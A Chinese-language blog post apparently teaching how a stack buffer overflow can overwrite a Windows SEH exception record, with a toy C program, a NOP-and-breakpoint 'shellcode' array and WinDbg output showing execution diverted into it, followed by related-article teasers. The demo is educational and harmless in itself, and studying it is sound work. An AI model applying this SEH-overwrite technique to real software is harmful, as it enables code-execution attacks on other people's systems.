栈溢出利用SEH异常处理

最新推荐文章于 2025-04-24 10:58:02 发布
原创 最新推荐文章于 2025-04-24 10:58:02 发布 · 2.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#调试 #windows

    前面一篇blog <堆溢出(DwordShoot)利用SEH异常处理 > 里提到了基于堆溢出利用SEH的方式,本文将侧重于栈溢出利用SEH异常处理。

    先来看下示例代码:

#include <windows.h>
#include <stdio.h>

char shellcode[] = {"\x90\x90\x90\x90\x90\x90\xeb\x10" \
					"\x90\x90\x90\x90\x90\x90\x90\xcc" \
					"\x90\x90\x90\x90\x08\x33\x42\x00" \
					"\x90\x90\x90\x90\x90\x90\x90\x90" };

int main()
{
	char buff[8] = {0};
	printf("shellcode:%08x\n",shellcode);
	int i=0,j=0;

	__try
	{
		
		memcpy(buff,shellcode,0x18);
		i/=j;
	}
	__except(1)
	{
		printf("exception handled\n");
	}

	return 0;
}
程序进入__try/__except块后,查看栈中刚形成的异常处理节点和buff的内存分布: 

0:000> !exchain
0012ff70: SEHOverflow!_except_handler3+0 (00401600)
  CRT scope  0, filter: SEHOverflow!main+92 (004010a2)
                func:   SEHOverflow!main+98 (004010a8)
0012ffb0: SEHOverflow!_except_handler3+0 (00401600)
  CRT scope  0, filter: SEHOverflow!mainCRTStartup+f8 (004017d8)
                func:   SEHOverflow!mainCRTStartup+113 (004017f3)
0012ffe0: kernel32!_except_handler3+0 (77e7bb86)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (77e85168)
                func:   kernel32!BaseProcessStart+3a (77e85179)
Invalid exception stack at ffffffff
0:000> dd buff L1
0012ff60  00000000
当前异常处理节点 _EXCEPTION_REGISTRATION_RECORD位于0x12ff70,buff位于0x12ff60,两者相距0x10B。换言之,只要往buff中拷贝超过0x10B字节,就能覆盖异常处理节点。但要修改 _EXCEPTION_REGISTRATION_RECORD! Handler,使得异常发生时跳进shellcode执行,则至少溢出到0x18B。 前文已经说过_EXCEPTION_REGISTRATION_RECORD! Handler中存放的是函数指针,指向__except_handler3函数,异常出现时通过( _EXCEPTION_REGISTRATION_RECORD-> Handler)();语句进入__except_handler3进行处理。为了跳进shellcode执行,需要将 _EXCEPTION_REGISTRATION_RECORD! Handler中保存的地址溢出为shellcode的地址。程序运行时,shellcode的地址是0x423308,因此,我向shellcode偏移0x14处填入0x423308,这样异常出发时即可跳进shellcode执行,如下图:

异常发生前:


触发异常:


触发异常后进入shellcode:


0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=00423308 edx=77f833b4 esi=00000000 edi=00000000
eip=00423308 esp=0012fb48 ebp=0012fb68 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
SEHOverflow!shellcode:
00423308 90              nop
0:000> u . 
SEHOverflow!shellcode:
00423308 90              nop
00423309 90              nop
0042330a 90              nop
0042330b 90              nop
0042330c 90              nop
0042330d 90              nop
0042330e eb10            jmp     SEHOverflow!shellcode+0x18 (00423320)
00423310 90              nop

    最后,我们来看下栈溢出后,对异常处理链表的影响: 
0:000> !exchain
0012fb5c: ntdll!ExecuteHandler2+3a (77f833b4)
0012ff70: SEHOverflow!shellcode+0 (00423308)
Invalid exception stack at 90909090
可以看到,由于buff溢出覆盖了整个异常处理节点,影响了 _EXCEPTION_REGISTRATION_RECORD!Next的值,因此,整个异常处理链表在发生覆盖后就突然断了。相对的,堆溢出后,仅仅影响的是_EXCEPTION_REGISTRATION_RECORD!Handle部分,比起栈溢出那种大动作,它优雅很多~





[网络安全自学篇] 五十四.Windows系统安全之基于SEH异常处理机制的栈溢出攻击及防御解析
杨秀璋的专栏
03-02 8769
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记。前文分享了XP和Kali环境搭建,通过Windows漏洞实现栈溢出攻击,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。本文将讲解基于SEH异常处理机制的栈溢出漏洞,XP系统通过连接Easy File Sharing Web Server 7.2文件传输服务,然后利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。基础性文章,希望对您有所帮助。
栈溢出利用SEH
W Blog
12-15 5566
结构化异常处理(SEH)         操作系统或程序在运行,难免会遇到各种各样的错误,如除零,非法内存访问,文件打开错误,内存不足,磁盘读写错误,外设操作失败。为了保证系统在遇到错误时不至于崩溃,仍能够健壮稳定地继续运行下去,windows会对运行在其中的程序提供一次补救的机会来处理错误这种机制就是异常处理机制。 S.E.H即异常处理结构体(Structure Exception Handl
c++利用SEH异常处理检测内存越界
最新发布
qq_62784677的博客
04-24 573
SEH更适合处理底层硬件异常和系统级错误,适用于 Windows 平台。C++标准异常处理更适合处理程序逻辑错误和高级异常,具有良好的跨平台性和可移植性。C++标准异常处理机制本身是线程安全的,并且支持多线程环境中的异常处理。然而,使用C++标准异常处理时需要注意一些与多线程相关的细节和限制。C++标准异常处理机制支持多线程环境中的异常处理,但需要开发者在多线程程序中谨慎使用。通过在每个线程中正确捕获和处理异常,可以确保多线程程序的稳定性和可靠性。
栈溢出笔记1.10 基于SEH栈溢出
hustd10的博客
04-16 9063
上节中简单地讲述了SEH的原理及逻辑结构。本节,要继续讲述SEH的物理结构及如何利用它进行栈溢出。先来看SEH的物理结构。先回想上节中的图51,我们在程序停在gets函数输入的时候查看SEH链,看到了一大堆异常处理器,而当我们把断点设置在gets函数下一条语句的时候,其中很多没有了,这给我们一个直观的感觉:SEH链保存在栈上。下面,我们就来看看栈上的SEH链。我们使用的是example_10,即添加
SEH溢出
kernweak的博客
06-13 650
_try { strcpy(buf,input); zero=4/zero; } _except(MyExceptionhandler){} SEH结构存放在系统栈中,当线程初始化时,会自动向栈中安装一个SEH,作为线程默认的异常处理。如果程序代码使用了tryexcept,或者assert宏等异常处理机制,编译器将最终通过当前函数栈帧中安装一个seh来实现异常处理,栈中一般有...
栈溢出笔记1.9 认识SEH
hustd10的博客
04-16 4965
从本节开始,我们就要研究一些稍微高级点的话题了,如同在1.2节中看到的,Windows中为抵抗栈溢出做了很多保护性的检查工作,编译的程序默认开启了这些保护。如果我们不能绕过这些保护,那么我们的Shellcode也就是一个玩具而已,什么都做不了。我们从SEH(结构化异常处理)开始。这篇文章讲SEH简洁易懂:http://www.securitysift.com/windows-exploit-deve
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 1067
作为一只二进制菜鸟,不,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数不会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
深入了解SEH异常处理与花指令技术
通过分析文件名称列表中的“录像.exe”,我们可以推断可能存在一个视频文件,演示如何实施或利用SEH异常处理结合花指令的技术。而“SEH异常.txt”和“教程说明.txt”则可能是文字材料,提供有关SEH异常处理的理论...
栈溢出、整型溢出、UAF溢出、覆盖返回地址、覆盖函数指针、覆盖SEH、格式化字符串溢出、栈溢出利用
10-17
栈溢出利用和覆盖函数指针、覆盖SEH则需要具体情况具体分析。 栈溢出:当程序向栈中写入超过其分配的空间时,就会发生栈溢出。攻击者可以利用这个漏洞来覆盖返回地址,从而控制程序流程。 整型溢出:当程序使用一...
掌握Windows XP的新型异常处理技术与SEH利用
- **最佳实践**:开发者应当遵循安全编码标准来编写SEH异常处理代码,避免可被利用的安全漏洞。 - **错误处理**:在异常处理代码中,应当正确处理错误情况,并确保异常处理逻辑不会被恶意操作。 5. **SEH与内存...
栈溢出和堆溢出中利用SEH
wangtiankuo的博客
11-02 1301
本文总结自《0day安全:软件漏洞分析技术》 1.TEB 该部分参考自https://bbs.pediy.com/thread-223816.htm 作者:AperOdry  ntdll.NtCurrentTeb()函数返回当前线程的TEB结构体指针。   fs:[0x18]处存放当前线程TEB结构体指针,值009BF00,即fs:[0x0]是TEB的起始地址。 此处介绍第一个结构...
0day安全第6章在栈溢出利用SEH.zip
04-03
《0day安全:软件漏洞分析技术》第6章在栈溢出利用SEH,自己写的例子,有兴趣的同学可以调试下。
栈溢出利用软件漏洞分析入门
04-08
栈溢出利用软件漏洞分析入门,挺不错滴、、、
winproxy 6.0 r1c stack/seh overflow 分析
weixin_34401479的博客
01-12 275
[0] 难得经典的远程堆栈溢出,又很好利用,分析下记个笔记,有问题请联系我。 [1] 调用堆栈WinProxy.0051F050    |    WinProxy.0051F4D0        |        WinProxy.00435E00            |            WinProxy.004360B0                |                ...
覆盖SEH的溢出利用检测思路
08-21 888
创建时间:2007-08-20文章属性:原创文章提交:kruglinski (kruglinski_at_sohu.com)看到安焦上的一篇《基于栈指纹检测缓冲区溢出的一点思路》,这是在ShellCode已经运行时在它的调用堆栈(被Hook的下级调用函数 LoadLibrary)里进行检测,有些利用溢出覆盖SEH Handler,然后任程序运行,因为溢出破坏了堆或栈,肯定会出现异常,这时指向She
java 栈溢出异常_JVM运行时数据区域及异常实战
weixin_34420979的博客
02-16 328
声明: 《深入理解Java虚拟机 JVM高级特性与最佳实践 第2版》。以下内容来自书中第二章。1. JVM概述JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。 引入Java语言虚拟机后,Java语言在不同平台上运行时不需要重新编译。Java语言使用Java虚拟机...
关于SEH(结构化异常处理)的一些知识
lanwanjunxixihaha的专栏
06-17 1006
梳理老罗win32汇编关于SEH一章的知识。 异常处理方式有两种: 筛选器异常处理和结构化异常处理,筛选器是全局性的,无法为一个线程或一个子程序单独设置一个异常处理回调函数,而结构化异常处理(Structured Exception Handing)SEH提供了每个线程之间独立的异常处理方法。 以下以两个例子来学习SEH 例子1:不含栈展开操作的异常处理(栈展开会在例子二中介绍) .386
SEH异常处理机制
谈成(C/C++)
04-12 2020
1.SEHwindows操作系统提供的异常处理机制。 2.在程序中可以使用__try、__except、__finally关键来实现异常处理。 3.SEH属于系统级的异常处理,是不同于C++中try、catch的。SEH诞生的更早一些。 4.异常处理过程: 正常情况:程序执行->抛出异常->程序SEH处理函数->系统默认SEH处理函数。 调试情况:程序执行->抛出异常->调试器中断处理->程序SEH异常处理->系统默认异常处理 如果程序没有异常处理函数
深入解析结构化异常处理(SEH) - by Matt Pietrek
热门推荐
dvlinker的技术专栏
09-18 5万+
深入解析结构化异常处理(SEH) - by Matt Pietrek
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值